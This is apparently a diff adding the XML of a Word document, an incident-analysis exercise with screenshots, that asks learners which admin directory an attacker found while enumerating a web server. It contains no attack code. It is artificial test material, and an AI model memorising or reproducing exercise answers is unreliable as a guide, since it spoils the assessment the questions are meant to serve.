+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>you</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identify</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>analysis</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>that</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>assisted</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attacker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>this</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>enumeration</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>process</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11598EAA" wp14:editId="39D024B2">
+            <wp:extent cx="5943600" cy="3178175"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+            <wp:docPr id="1301514368" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1301514368" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3178175"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>After</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>enumerating</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>directories</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>our</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>web</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attacker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>made</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>numerous</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>requests</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identify</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>administrative</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>interfaces</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Which</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>directory</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>related</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to the admin </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>panel</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>did</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attacker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>uncover</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>? (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Provide</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>path</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>including</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>leading</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>slash</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>e.g</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>. /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>path</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78C84C16" wp14:editId="7EBF6E20">
+            <wp:extent cx="5943600" cy="3087370"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1118076075" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1118076075" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
